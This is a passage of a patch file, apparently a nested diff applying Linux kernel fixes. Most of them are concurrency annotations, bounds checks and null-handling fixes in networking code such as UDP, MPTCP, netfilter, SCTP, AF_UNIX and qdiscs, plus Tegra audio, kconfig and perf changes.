+ 	if (delta <= 0)
+ 		return;
+ 	amt = sk_mem_pages(delta);
+-	sk->sk_forward_alloc += amt << PAGE_SHIFT;
++	sk_forward_alloc_add(sk, amt << PAGE_SHIFT);
+ 	sk_memory_allocated_add(sk, amt);
+ 
+ 	if (mem_cgroup_sockets_enabled && sk->sk_memcg)
+diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
+index 42c1f7d9a980a..b2aa7777521f6 100644
+--- a/net/ipv4/udp.c
++++ b/net/ipv4/udp.c
+@@ -1474,9 +1474,9 @@ static void udp_rmem_release(struct sock *sk, int size, int partial,
+ 		spin_lock(&sk_queue->lock);
+ 
+ 
+-	sk->sk_forward_alloc += size;
++	sk_forward_alloc_add(sk, size);
+ 	amt = (sk->sk_forward_alloc - partial) & ~(PAGE_SIZE - 1);
+-	sk->sk_forward_alloc -= amt;
++	sk_forward_alloc_add(sk, -amt);
+ 
+ 	if (amt)
+ 		__sk_mem_reduce_allocated(sk, amt >> PAGE_SHIFT);
+@@ -1582,7 +1582,7 @@ int __udp_enqueue_schedule_skb(struct sock *sk, struct sk_buff *skb)
+ 		sk->sk_forward_alloc += delta;
+ 	}
+ 
+-	sk->sk_forward_alloc -= size;
++	sk_forward_alloc_add(sk, -size);
+ 
+ 	/* no need to setup a destructor, we will explicitly release the
+ 	 * forward allocated memory on dequeue
+diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
+index 48a6486951cd6..83be842198244 100644
+--- a/net/ipv6/addrconf.c
++++ b/net/ipv6/addrconf.c
+@@ -1368,7 +1368,7 @@ retry:
+ 	 * idev->desync_factor if it's larger
+ 	 */
+ 	cnf_temp_preferred_lft = READ_ONCE(idev->cnf.temp_prefered_lft);
+-	max_desync_factor = min_t(__u32,
++	max_desync_factor = min_t(long,
+ 				  idev->cnf.max_desync_factor,
+ 				  cnf_temp_preferred_lft - regen_advance);
+ 
+diff --git a/net/ipv6/ip6_input.c b/net/ipv6/ip6_input.c
+index d94041bb42872..b8378814532ce 100644
+--- a/net/ipv6/ip6_input.c
++++ b/net/ipv6/ip6_input.c
+@@ -99,7 +99,8 @@ static bool ip6_can_use_hint(const struct sk_buff *skb,
+ static struct sk_buff *ip6_extract_route_hint(const struct net *net,
+ 					      struct sk_buff *skb)
+ {
+-	if (fib6_routes_require_src(net) || fib6_has_custom_rules(net))
++	if (fib6_routes_require_src(net) || fib6_has_custom_rules(net) ||
++	    IP6CB(skb)->flags & IP6SKB_MULTIPATH)
+ 		return NULL;
+ 
+ 	return skb;
+diff --git a/net/ipv6/route.c b/net/ipv6/route.c
+index 960ab43a49c46..93957b20fccce 100644
+--- a/net/ipv6/route.c
++++ b/net/ipv6/route.c
+@@ -425,6 +425,9 @@ void fib6_select_path(const struct net *net, struct fib6_result *res,
+ 	if (match->nh && have_oif_match && res->nh)
+ 		return;
+ 
++	if (skb)
++		IP6CB(skb)->flags |= IP6SKB_MULTIPATH;
++
+ 	/* We might have already computed the hash for ICMPv6 errors. In such
+ 	 * case it will always be non-zero. Otherwise now is the time to do it.
+ 	 */
+diff --git a/net/kcm/kcmsock.c b/net/kcm/kcmsock.c
+index 890a2423f559e..65845c59c0655 100644
+--- a/net/kcm/kcmsock.c
++++ b/net/kcm/kcmsock.c
+@@ -1065,15 +1065,18 @@ partial_message:
+ out_error:
+ 	kcm_push(kcm);
+ 
+-	if (copied && sock->type == SOCK_SEQPACKET) {
++	if (sock->type == SOCK_SEQPACKET) {
+ 		/* Wrote some bytes before encountering an
+ 		 * error, return partial success.
+ 		 */
+-		goto partial_message;
+-	}
+-
+-	if (head != kcm->seq_skb)
++		if (copied)
++			goto partial_message;
++		if (head != kcm->seq_skb)
++			kfree_skb(head);
++	} else {
+ 		kfree_skb(head);
++		kcm->seq_skb = NULL;
++	}
+ 
+ 	err = sk_stream_error(sk, msg->msg_flags, err);
+ 
+@@ -1981,6 +1984,8 @@ static __net_exit void kcm_exit_net(struct net *net)
+ 	 * that all multiplexors and psocks have been destroyed.
+ 	 */
+ 	WARN_ON(!list_empty(&knet->mux_list));
++
++	mutex_destroy(&knet->mutex);
+ }
+ 
+ static struct pernet_operations kcm_net_ops = {
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 61fefa1a82db2..6dd880d6b0518 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -131,9 +131,15 @@ static void mptcp_drop(struct sock *sk, struct sk_buff *skb)
+ 	__kfree_skb(skb);
+ }
+ 
++static void mptcp_rmem_fwd_alloc_add(struct sock *sk, int size)
++{
++	WRITE_ONCE(mptcp_sk(sk)->rmem_fwd_alloc,
++		   mptcp_sk(sk)->rmem_fwd_alloc + size);
++}
++
+ static void mptcp_rmem_charge(struct sock *sk, int size)
+ {
+-	mptcp_sk(sk)->rmem_fwd_alloc -= size;
++	mptcp_rmem_fwd_alloc_add(sk, -size);
+ }
+ 
+ static bool mptcp_try_coalesce(struct sock *sk, struct sk_buff *to,
+@@ -174,7 +180,7 @@ static bool mptcp_ooo_try_coalesce(struct mptcp_sock *msk, struct sk_buff *to,
+ static void __mptcp_rmem_reclaim(struct sock *sk, int amount)
+ {
+ 	amount >>= PAGE_SHIFT;
+-	mptcp_sk(sk)->rmem_fwd_alloc -= amount << PAGE_SHIFT;
++	mptcp_rmem_charge(sk, amount << PAGE_SHIFT);
+ 	__sk_mem_reduce_allocated(sk, amount);
+ }
+ 
+@@ -183,7 +189,7 @@ static void mptcp_rmem_uncharge(struct sock *sk, int size)
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+ 	int reclaimable;
+ 
+-	msk->rmem_fwd_alloc += size;
++	mptcp_rmem_fwd_alloc_add(sk, size);
+ 	reclaimable = msk->rmem_fwd_alloc - sk_unused_reserved_mem(sk);
+ 
+ 	/* see sk_mem_uncharge() for the rationale behind the following schema */
+@@ -338,7 +344,7 @@ static bool mptcp_rmem_schedule(struct sock *sk, struct sock *ssk, int size)
+ 	if (!__sk_mem_raise_allocated(sk, size, amt, SK_MEM_RECV))
+ 		return false;
+ 
+-	msk->rmem_fwd_alloc += amount;
++	mptcp_rmem_fwd_alloc_add(sk, amount);
+ 	return true;
+ }
+ 
+@@ -1802,7 +1808,7 @@ static int mptcp_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 		}
+ 
+ 		/* data successfully copied into the write queue */
+-		sk->sk_forward_alloc -= total_ts;
++		sk_forward_alloc_add(sk, -total_ts);
+ 		copied += psize;
+ 		dfrag->data_len += psize;
+ 		frag_truesize += psize;
+@@ -3278,8 +3284,8 @@ void mptcp_destroy_common(struct mptcp_sock *msk, unsigned int flags)
+ 	/* move all the rx fwd alloc into the sk_mem_reclaim_final in
+ 	 * inet_sock_destruct() will dispose it
+ 	 */
+-	sk->sk_forward_alloc += msk->rmem_fwd_alloc;
+-	msk->rmem_fwd_alloc = 0;
++	sk_forward_alloc_add(sk, msk->rmem_fwd_alloc);
++	WRITE_ONCE(msk->rmem_fwd_alloc, 0);
+ 	mptcp_token_destroy(msk);
+ 	mptcp_pm_free_anno_list(msk);
+ 	mptcp_free_local_addr_list(msk);
+@@ -3562,7 +3568,8 @@ static void mptcp_shutdown(struct sock *sk, int how)
+ 
+ static int mptcp_forward_alloc_get(const struct sock *sk)
+ {
+-	return sk->sk_forward_alloc + mptcp_sk(sk)->rmem_fwd_alloc;
++	return READ_ONCE(sk->sk_forward_alloc) +
++	       READ_ONCE(mptcp_sk(sk)->rmem_fwd_alloc);
+ }
+ 
+ static int mptcp_ioctl_outq(const struct mptcp_sock *msk, u64 v)
+diff --git a/net/netfilter/nfnetlink_osf.c b/net/netfilter/nfnetlink_osf.c
+index 8f1bfa6ccc2d9..50723ba082890 100644
+--- a/net/netfilter/nfnetlink_osf.c
++++ b/net/netfilter/nfnetlink_osf.c
+@@ -315,6 +315,14 @@ static int nfnl_osf_add_callback(struct sk_buff *skb,
+ 
+ 	f = nla_data(osf_attrs[OSF_ATTR_FINGER]);
+ 
++	if (f->opt_num > ARRAY_SIZE(f->opt))
++		return -EINVAL;
++
++	if (!memchr(f->genre, 0, MAXGENRELEN) ||
++	    !memchr(f->subtype, 0, MAXGENRELEN) ||
++	    !memchr(f->version, 0, MAXGENRELEN))
++		return -EINVAL;
++
+ 	kf = kmalloc(sizeof(struct nf_osf_finger), GFP_KERNEL);
+ 	if (!kf)
+ 		return -ENOMEM;
+diff --git a/net/netfilter/nft_exthdr.c b/net/netfilter/nft_exthdr.c
+index c307c57a93e57..efb50c2b41f32 100644
+--- a/net/netfilter/nft_exthdr.c
++++ b/net/netfilter/nft_exthdr.c
+@@ -35,6 +35,14 @@ static unsigned int optlen(const u8 *opt, unsigned int offset)
+ 		return opt[offset + 1];
+ }
+ 
++static int nft_skb_copy_to_reg(const struct sk_buff *skb, int offset, u32 *dest, unsigned int len)
++{
++	if (len % NFT_REG32_SIZE)
++		dest[len / NFT_REG32_SIZE] = 0;
++
++	return skb_copy_bits(skb, offset, dest, len);
++}
++
+ static void nft_exthdr_ipv6_eval(const struct nft_expr *expr,
+ 				 struct nft_regs *regs,
+ 				 const struct nft_pktinfo *pkt)
+@@ -56,8 +64,7 @@ static void nft_exthdr_ipv6_eval(const struct nft_expr *expr,
+ 	}
+ 	offset += priv->offset;
+ 
+-	dest[priv->len / NFT_REG32_SIZE] = 0;
+-	if (skb_copy_bits(pkt->skb, offset, dest, priv->len) < 0)
++	if (nft_skb_copy_to_reg(pkt->skb, offset, dest, priv->len) < 0)
+ 		goto err;
+ 	return;
+ err:
+@@ -153,8 +160,7 @@ static void nft_exthdr_ipv4_eval(const struct nft_expr *expr,
+ 	}
+ 	offset += priv->offset;
+ 
+-	dest[priv->len / NFT_REG32_SIZE] = 0;
+-	if (skb_copy_bits(pkt->skb, offset, dest, priv->len) < 0)
++	if (nft_skb_copy_to_reg(pkt->skb, offset, dest, priv->len) < 0)
+ 		goto err;
+ 	return;
+ err:
+@@ -210,7 +216,8 @@ static void nft_exthdr_tcp_eval(const struct nft_expr *expr,
+ 		if (priv->flags & NFT_EXTHDR_F_PRESENT) {
+ 			*dest = 1;
+ 		} else {
+-			dest[priv->len / NFT_REG32_SIZE] = 0;
++			if (priv->len % NFT_REG32_SIZE)
++				dest[priv->len / NFT_REG32_SIZE] = 0;
+ 			memcpy(dest, opt + offset, priv->len);
+ 		}
+ 
+@@ -388,9 +395,8 @@ static void nft_exthdr_sctp_eval(const struct nft_expr *expr,
+ 			    offset + ntohs(sch->length) > pkt->skb->len)
+ 				break;
+ 
+-			dest[priv->len / NFT_REG32_SIZE] = 0;
+-			if (skb_copy_bits(pkt->skb, offset + priv->offset,
+-					  dest, priv->len) < 0)
++			if (nft_skb_copy_to_reg(pkt->skb, offset + priv->offset,
++						dest, priv->len) < 0)
+ 				break;
+ 			return;
+ 		}
+diff --git a/net/sched/sch_fq_pie.c b/net/sched/sch_fq_pie.c
+index 591d87d5e5c0f..68e6acd0f130d 100644
+--- a/net/sched/sch_fq_pie.c
++++ b/net/sched/sch_fq_pie.c
+@@ -61,6 +61,7 @@ struct fq_pie_sched_data {
+ 	struct pie_params p_params;
+ 	u32 ecn_prob;
+ 	u32 flows_cnt;
++	u32 flows_cursor;
+ 	u32 quantum;
+ 	u32 memory_limit;
+ 	u32 new_flow_count;
+@@ -375,22 +376,32 @@ flow_error:
+ static void fq_pie_timer(struct timer_list *t)
+ {
+ 	struct fq_pie_sched_data *q = from_timer(q, t, adapt_timer);
++	unsigned long next, tupdate;
+ 	struct Qdisc *sch = q->sch;
+ 	spinlock_t *root_lock; /* to lock qdisc for probability calculations */
+-	u32 idx;
++	int max_cnt, i;
+ 
+ 	rcu_read_lock();
+ 	root_lock = qdisc_lock(qdisc_root_sleeping(sch));
+ 	spin_lock(root_lock);
+ 
+-	for (idx = 0; idx < q->flows_cnt; idx++)
+-		pie_calculate_probability(&q->p_params, &q->flows[idx].vars,
+-					  q->flows[idx].backlog);
+-
+-	/* reset the timer to fire after 'tupdate' jiffies. */
+-	if (q->p_params.tupdate)
+-		mod_timer(&q->adapt_timer, jiffies + q->p_params.tupdate);
++	/* Limit this expensive loop to 2048 flows per round. */
++	max_cnt = min_t(int, q->flows_cnt - q->flows_cursor, 2048);
++	for (i = 0; i < max_cnt; i++) {
++		pie_calculate_probability(&q->p_params,
++					  &q->flows[q->flows_cursor].vars,
++					  q->flows[q->flows_cursor].backlog);
++		q->flows_cursor++;
++	}
+ 
++	tupdate = q->p_params.tupdate;
++	next = 0;
++	if (q->flows_cursor >= q->flows_cnt) {
++		q->flows_cursor = 0;
++		next = tupdate;
++	}
++	if (tupdate)
++		mod_timer(&q->adapt_timer, jiffies + next);
+ 	spin_unlock(root_lock);
+ 	rcu_read_unlock();
+ }
+diff --git a/net/sched/sch_plug.c b/net/sched/sch_plug.c
+index ea8c4a7174bba..35f49edf63dbf 100644
+--- a/net/sched/sch_plug.c
++++ b/net/sched/sch_plug.c
+@@ -207,7 +207,7 @@ static struct Qdisc_ops plug_qdisc_ops __read_mostly = {
+ 	.priv_size   =       sizeof(struct plug_sched_data),
+ 	.enqueue     =       plug_enqueue,
+ 	.dequeue     =       plug_dequeue,
+-	.peek        =       qdisc_peek_head,
++	.peek        =       qdisc_peek_dequeued,
+ 	.init        =       plug_init,
+ 	.change      =       plug_change,
+ 	.reset       =	     qdisc_reset_queue,
+diff --git a/net/sched/sch_qfq.c b/net/sched/sch_qfq.c
+index e150d08f182d8..ed01634af82c2 100644
+--- a/net/sched/sch_qfq.c
++++ b/net/sched/sch_qfq.c
+@@ -973,10 +973,13 @@ static void qfq_update_eligible(struct qfq_sched *q)
+ }
+ 
+ /* Dequeue head packet of the head class in the DRR queue of the aggregate. */
+-static void agg_dequeue(struct qfq_aggregate *agg,
+-			struct qfq_class *cl, unsigned int len)
++static struct sk_buff *agg_dequeue(struct qfq_aggregate *agg,
++				   struct qfq_class *cl, unsigned int len)
+ {
+-	qdisc_dequeue_peeked(cl->qdisc);
++	struct sk_buff *skb = qdisc_dequeue_peeked(cl->qdisc);
++
++	if (!skb)
++		return NULL;
+ 
+ 	cl->deficit -= (int) len;
+ 
+@@ -986,6 +989,8 @@ static void agg_dequeue(struct qfq_aggregate *agg,
+ 		cl->deficit += agg->lmax;
+ 		list_move_tail(&cl->alist, &agg->active);
+ 	}
++
++	return skb;
+ }
+ 
+ static inline struct sk_buff *qfq_peek_skb(struct qfq_aggregate *agg,
+@@ -1131,11 +1136,18 @@ static struct sk_buff *qfq_dequeue(struct Qdisc *sch)
+ 	if (!skb)
+ 		return NULL;
+ 
+-	qdisc_qstats_backlog_dec(sch, skb);
+ 	sch->q.qlen--;
++
++	skb = agg_dequeue(in_serv_agg, cl, len);
++
++	if (!skb) {
++		sch->q.qlen++;
++		return NULL;
++	}
++
++	qdisc_qstats_backlog_dec(sch, skb);
+ 	qdisc_bstats_update(sch, skb);
+ 
+-	agg_dequeue(in_serv_agg, cl, len);
+ 	/* If lmax is lowered, through qfq_change_class, for a class
+ 	 * owning pending packets with larger size than the new value
+ 	 * of lmax, then the following condition may hold.
+diff --git a/net/sctp/proc.c b/net/sctp/proc.c
+index f13d6a34f32f2..ec00ee75d59a6 100644
+--- a/net/sctp/proc.c
++++ b/net/sctp/proc.c
+@@ -282,7 +282,7 @@ static int sctp_assocs_seq_show(struct seq_file *seq, void *v)
+ 		assoc->init_retries, assoc->shutdown_retries,
+ 		assoc->rtx_data_chunks,
+ 		refcount_read(&sk->sk_wmem_alloc),
+-		sk->sk_wmem_queued,
++		READ_ONCE(sk->sk_wmem_queued),
+ 		sk->sk_sndbuf,
+ 		sk->sk_rcvbuf);
+ 	seq_printf(seq, "\n");
+diff --git a/net/sctp/socket.c b/net/sctp/socket.c
+index a11b0d903514c..32e3669adf146 100644
+--- a/net/sctp/socket.c
++++ b/net/sctp/socket.c
+@@ -68,7 +68,7 @@
+ #include <net/sctp/stream_sched.h>
+ 
+ /* Forward declarations for internal helper functions. */
+-static bool sctp_writeable(struct sock *sk);
++static bool sctp_writeable(const struct sock *sk);
+ static void sctp_wfree(struct sk_buff *skb);
+ static int sctp_wait_for_sndbuf(struct sctp_association *asoc, long *timeo_p,
+ 				size_t msg_len);
+@@ -139,7 +139,7 @@ static inline void sctp_set_owner_w(struct sctp_chunk *chunk)
+ 
+ 	refcount_add(sizeof(struct sctp_chunk), &sk->sk_wmem_alloc);
+ 	asoc->sndbuf_used += chunk->skb->truesize + sizeof(struct sctp_chunk);
+-	sk->sk_wmem_queued += chunk->skb->truesize + sizeof(struct sctp_chunk);
++	sk_wmem_queued_add(sk, chunk->skb->truesize + sizeof(struct sctp_chunk));
+ 	sk_mem_charge(sk, chunk->skb->truesize);
+ }
+ 
+@@ -9139,7 +9139,7 @@ static void sctp_wfree(struct sk_buff *skb)
+ 	struct sock *sk = asoc->base.sk;
+ 
+ 	sk_mem_uncharge(sk, skb->truesize);
+-	sk->sk_wmem_queued -= skb->truesize + sizeof(struct sctp_chunk);
++	sk_wmem_queued_add(sk, -(skb->truesize + sizeof(struct sctp_chunk)));
+ 	asoc->sndbuf_used -= skb->truesize + sizeof(struct sctp_chunk);
+ 	WARN_ON(refcount_sub_and_test(sizeof(struct sctp_chunk),
+ 				      &sk->sk_wmem_alloc));
+@@ -9292,9 +9292,9 @@ void sctp_write_space(struct sock *sk)
+  * UDP-style sockets or TCP-style sockets, this code should work.
+  *  - Daisy
+  */
+-static bool sctp_writeable(struct sock *sk)
++static bool sctp_writeable(const struct sock *sk)
+ {
+-	return sk->sk_sndbuf > sk->sk_wmem_queued;
++	return READ_ONCE(sk->sk_sndbuf) > READ_ONCE(sk->sk_wmem_queued);
+ }
+ 
+ /* Wait for an association to go into ESTABLISHED state. If timeout is 0,
+diff --git a/net/smc/smc_core.c b/net/smc/smc_core.c
+index c676d92af7b7d..64b6dd439938e 100644
+--- a/net/smc/smc_core.c
++++ b/net/smc/smc_core.c
+@@ -1650,6 +1650,7 @@ void smcr_port_add(struct smc_ib_device *smcibdev, u8 ibport)
+ {
+ 	struct smc_link_group *lgr, *n;
+ 
++	spin_lock_bh(&smc_lgr_list.lock);
+ 	list_for_each_entry_safe(lgr, n, &smc_lgr_list.list, list) {
+ 		struct smc_link *link;
+ 
+@@ -1665,6 +1666,7 @@ void smcr_port_add(struct smc_ib_device *smcibdev, u8 ibport)
+ 		if (link)
+ 			smc_llc_add_link_local(link);
+ 	}
++	spin_unlock_bh(&smc_lgr_list.lock);
+ }
+ 
+ /* link is down - switch connections to alternate link,
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index 96b4545ea700f..9be00ebbb2341 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -802,7 +802,7 @@ static int bpf_exec_tx_verdict(struct sk_msg *msg, struct sock *sk,
+ 	psock = sk_psock_get(sk);
+ 	if (!psock || !policy) {
+ 		err = tls_push_record(sk, flags, record_type);
+-		if (err && sk->sk_err == EBADMSG) {
++		if (err && err != -EINPROGRESS && sk->sk_err == EBADMSG) {
+ 			*copied -= sk_msg_free(sk, msg);
+ 			tls_free_open_rec(sk);
+ 			err = -sk->sk_err;
+@@ -831,7 +831,7 @@ more_data:
+ 	switch (psock->eval) {
+ 	case __SK_PASS:
+ 		err = tls_push_record(sk, flags, record_type);
+-		if (err && sk->sk_err == EBADMSG) {
++		if (err && err != -EINPROGRESS && sk->sk_err == EBADMSG) {
+ 			*copied -= sk_msg_free(sk, msg);
+ 			tls_free_open_rec(sk);
+ 			err = -sk->sk_err;
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index ca31847a6c70c..310952f4c68f7 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -667,7 +667,7 @@ static void unix_release_sock(struct sock *sk, int embrion)
+ 	 *	  What the above comment does talk about? --ANK(980817)
+ 	 */
+ 
+-	if (unix_tot_inflight)
++	if (READ_ONCE(unix_tot_inflight))
+ 		unix_gc();		/* Garbage collect fds */
+ }
+ 
+diff --git a/net/unix/scm.c b/net/unix/scm.c
+index aa27a02478dc1..e8e2a00bb0f58 100644
+--- a/net/unix/scm.c
++++ b/net/unix/scm.c
+@@ -63,7 +63,7 @@ void unix_inflight(struct user_struct *user, struct file *fp)
+ 		/* Paired with READ_ONCE() in wait_for_unix_gc() */
+ 		WRITE_ONCE(unix_tot_inflight, unix_tot_inflight + 1);
+ 	}
+-	user->unix_inflight++;
++	WRITE_ONCE(user->unix_inflight, user->unix_inflight + 1);
+ 	spin_unlock(&unix_gc_lock);
+ }
+ 
+@@ -84,7 +84,7 @@ void unix_notinflight(struct user_struct *user, struct file *fp)
+ 		/* Paired with READ_ONCE() in wait_for_unix_gc() */
+ 		WRITE_ONCE(unix_tot_inflight, unix_tot_inflight - 1);
+ 	}
+-	user->unix_inflight--;
++	WRITE_ONCE(user->unix_inflight, user->unix_inflight - 1);
+ 	spin_unlock(&unix_gc_lock);
+ }
+ 
+@@ -98,7 +98,7 @@ static inline bool too_many_unix_fds(struct task_struct *p)
+ {
+ 	struct user_struct *user = current_user();
+ 
+-	if (unlikely(user->unix_inflight > task_rlimit(p, RLIMIT_NOFILE)))
++	if (unlikely(READ_ONCE(user->unix_inflight) > task_rlimit(p, RLIMIT_NOFILE)))
+ 		return !capable(CAP_SYS_RESOURCE) && !capable(CAP_SYS_ADMIN);
+ 	return false;
+ }
+diff --git a/net/xdp/xsk_diag.c b/net/xdp/xsk_diag.c
+index c014217f5fa7d..22b36c8143cfd 100644
+--- a/net/xdp/xsk_diag.c
++++ b/net/xdp/xsk_diag.c
+@@ -111,6 +111,9 @@ static int xsk_diag_fill(struct sock *sk, struct sk_buff *nlskb,
+ 	sock_diag_save_cookie(sk, msg->xdiag_cookie);
+ 
+ 	mutex_lock(&xs->mutex);
++	if (READ_ONCE(xs->state) == XSK_UNBOUND)
++		goto out_nlmsg_trim;
++
+ 	if ((req->xdiag_show & XDP_SHOW_INFO) && xsk_diag_put_info(xs, nlskb))
+ 		goto out_nlmsg_trim;
+ 
+diff --git a/scripts/kconfig/preprocess.c b/scripts/kconfig/preprocess.c
+index 748da578b418c..d1f5bcff4b62d 100644
+--- a/scripts/kconfig/preprocess.c
++++ b/scripts/kconfig/preprocess.c
+@@ -396,6 +396,9 @@ static char *eval_clause(const char *str, size_t len, int argc, char *argv[])
+ 
+ 		p++;
+ 	}
++
++	if (new_argc >= FUNCTION_MAX_ARGS)
++		pperror("too many function arguments");
+ 	new_argv[new_argc++] = prev;
+ 
+ 	/*
+diff --git a/scripts/package/mkspec b/scripts/package/mkspec
+index 70392fd2fd29c..f892cf8e37f03 100755
+--- a/scripts/package/mkspec
++++ b/scripts/package/mkspec
+@@ -51,7 +51,7 @@ $S	Source: kernel-$__KERNELRELEASE.tar.gz
+ 	Provides: $PROVIDES
+ 	# $UTS_MACHINE as a fallback of _arch in case
+ 	# /usr/lib/rpm/platform/*/macros was not included.
+-	%define _arch %{?_arch:$UTS_MACHINE}
++	%{!?_arch: %define _arch $UTS_MACHINE}
+ 	%define __spec_install_post /usr/lib/rpm/brp-compress || :
+ 	%define debug_package %{nil}
+ 
+diff --git a/sound/soc/tegra/tegra210_sfc.c b/sound/soc/tegra/tegra210_sfc.c
+index 368f077e7bee7..5d2125aa61229 100644
+--- a/sound/soc/tegra/tegra210_sfc.c
++++ b/sound/soc/tegra/tegra210_sfc.c
+@@ -2,7 +2,7 @@
+ //
+ // tegra210_sfc.c - Tegra210 SFC driver
+ //
+-// Copyright (c) 2021 NVIDIA CORPORATION.  All rights reserved.
++// Copyright (c) 2021-2023 NVIDIA CORPORATION.  All rights reserved.
+ 
+ #include <linux/clk.h>
+ #include <linux/device.h>
+@@ -42,6 +42,7 @@ static const int tegra210_sfc_rates[TEGRA210_SFC_NUM_RATES] = {
+ 	32000,
+ 	44100,
+ 	48000,
++	64000,
+ 	88200,
+ 	96000,
+ 	176400,
+@@ -2857,6 +2858,7 @@ static s32 *coef_addr_table[TEGRA210_SFC_NUM_RATES][TEGRA210_SFC_NUM_RATES] = {
+ 		coef_8to32,
+ 		coef_8to44,
+ 		coef_8to48,
++		UNSUPP_CONV,
+ 		coef_8to88,
+ 		coef_8to96,
+ 		UNSUPP_CONV,
+@@ -2872,6 +2874,7 @@ static s32 *coef_addr_table[TEGRA210_SFC_NUM_RATES][TEGRA210_SFC_NUM_RATES] = {
+ 		coef_11to32,
+ 		coef_11to44,
+ 		coef_11to48,
++		UNSUPP_CONV,
+ 		coef_11to88,
+ 		coef_11to96,
+ 		UNSUPP_CONV,
+@@ -2887,6 +2890,7 @@ static s32 *coef_addr_table[TEGRA210_SFC_NUM_RATES][TEGRA210_SFC_NUM_RATES] = {
+ 		coef_16to32,
+ 		coef_16to44,
+ 		coef_16to48,
++		UNSUPP_CONV,
+ 		coef_16to88,
+ 		coef_16to96,
+ 		coef_16to176,
+@@ -2902,6 +2906,7 @@ static s32 *coef_addr_table[TEGRA210_SFC_NUM_RATES][TEGRA210_SFC_NUM_RATES] = {
+ 		coef_22to32,
+ 		coef_22to44,
+ 		coef_22to48,
++		UNSUPP_CONV,
+ 		coef_22to88,
+ 		coef_22to96,
+ 		coef_22to176,
+@@ -2917,6 +2922,7 @@ static s32 *coef_addr_table[TEGRA210_SFC_NUM_RATES][TEGRA210_SFC_NUM_RATES] = {
+ 		coef_24to32,
+ 		coef_24to44,
+ 		coef_24to48,
++		UNSUPP_CONV,
+ 		coef_24to88,
+ 		coef_24to96,
+ 		coef_24to176,
+@@ -2932,6 +2938,7 @@ static s32 *coef_addr_table[TEGRA210_SFC_NUM_RATES][TEGRA210_SFC_NUM_RATES] = {
+ 		BYPASS_CONV,
+ 		coef_32to44,
+ 		coef_32to48,
++		UNSUPP_CONV,
+ 		coef_32to88,
+ 		coef_32to96,
+ 		coef_32to176,
+@@ -2947,6 +2954,7 @@ static s32 *coef_addr_table[TEGRA210_SFC_NUM_RATES][TEGRA210_SFC_NUM_RATES] = {
+ 		coef_44to32,
+ 		BYPASS_CONV,
+ 		coef_44to48,
++		UNSUPP_CONV,
+ 		coef_44to88,
+ 		coef_44to96,
+ 		coef_44to176,
+@@ -2962,11 +2970,28 @@ static s32 *coef_addr_table[TEGRA210_SFC_NUM_RATES][TEGRA210_SFC_NUM_RATES] = {
+ 		coef_48to32,
+ 		coef_48to44,
+ 		BYPASS_CONV,
++		UNSUPP_CONV,
+ 		coef_48to88,
+ 		coef_48to96,
+ 		coef_48to176,
+ 		coef_48to192,
+ 	},
++	/* Convertions from 64 kHz */
++	{
++		UNSUPP_CONV,
++		UNSUPP_CONV,
++		UNSUPP_CONV,
++		UNSUPP_CONV,
++		UNSUPP_CONV,
++		UNSUPP_CONV,
++		UNSUPP_CONV,
++		UNSUPP_CONV,
++		UNSUPP_CONV,
++		UNSUPP_CONV,
++		UNSUPP_CONV,
++		UNSUPP_CONV,
++		UNSUPP_CONV,
++	},
+ 	/* Convertions from 88.2 kHz */
+ 	{
+ 		coef_88to8,
+@@ -2977,6 +3002,7 @@ static s32 *coef_addr_table[TEGRA210_SFC_NUM_RATES][TEGRA210_SFC_NUM_RATES] = {
+ 		coef_88to32,
+ 		coef_88to44,
+ 		coef_88to48,
++		UNSUPP_CONV,
+ 		BYPASS_CONV,
+ 		coef_88to96,
+ 		coef_88to176,
+@@ -2991,6 +3017,7 @@ static s32 *coef_addr_table[TEGRA210_SFC_NUM_RATES][TEGRA210_SFC_NUM_RATES] = {
+ 		coef_96to32,
+ 		coef_96to44,
+ 		coef_96to48,
++		UNSUPP_CONV,
+ 		coef_96to88,
+ 		BYPASS_CONV,
+ 		coef_96to176,
+@@ -3006,6 +3033,7 @@ static s32 *coef_addr_table[TEGRA210_SFC_NUM_RATES][TEGRA210_SFC_NUM_RATES] = {
+ 		coef_176to32,
+ 		coef_176to44,
+ 		coef_176to48,
++		UNSUPP_CONV,
+ 		coef_176to88,
+ 		coef_176to96,
+ 		BYPASS_CONV,
+@@ -3021,6 +3049,7 @@ static s32 *coef_addr_table[TEGRA210_SFC_NUM_RATES][TEGRA210_SFC_NUM_RATES] = {
+ 		coef_192to32,
+ 		coef_192to44,
+ 		coef_192to48,
++		UNSUPP_CONV,
+ 		coef_192to88,
+ 		coef_192to96,
+ 		coef_192to176,
+diff --git a/sound/soc/tegra/tegra210_sfc.h b/sound/soc/tegra/tegra210_sfc.h
+index 5a6b66e297d8f..a4c993d79403a 100644
+--- a/sound/soc/tegra/tegra210_sfc.h
++++ b/sound/soc/tegra/tegra210_sfc.h
+@@ -2,7 +2,7 @@
+ /*
+  * tegra210_sfc.h - Definitions for Tegra210 SFC driver
+  *
+- * Copyright (c) 2021 NVIDIA CORPORATION.  All rights reserved.
++ * Copyright (c) 2021-2023 NVIDIA CORPORATION.  All rights reserved.
+  *
+  */
+ 
+@@ -47,7 +47,7 @@
+ #define TEGRA210_SFC_EN_SHIFT			0
+ #define TEGRA210_SFC_EN				(1 << TEGRA210_SFC_EN_SHIFT)
+ 
+-#define TEGRA210_SFC_NUM_RATES 12
++#define TEGRA210_SFC_NUM_RATES 13
+ 
+ /* Fields in TEGRA210_SFC_COEF_RAM */
+ #define TEGRA210_SFC_COEF_RAM_EN		BIT(0)
+diff --git a/tools/perf/builtin-top.c b/tools/perf/builtin-top.c
+index 4b3ff7687236e..f9917848cdad0 100644
+--- a/tools/perf/builtin-top.c
++++ b/tools/perf/builtin-top.c
+@@ -1751,6 +1751,7 @@ int cmd_top(int argc, const char **argv)
+ 	top.session = perf_session__new(NULL, NULL);
+ 	if (IS_ERR(top.session)) {
+ 		status = PTR_ERR(top.session);
++		top.session = NULL;
+ 		goto out_delete_evlist;
+ 	}
+ 
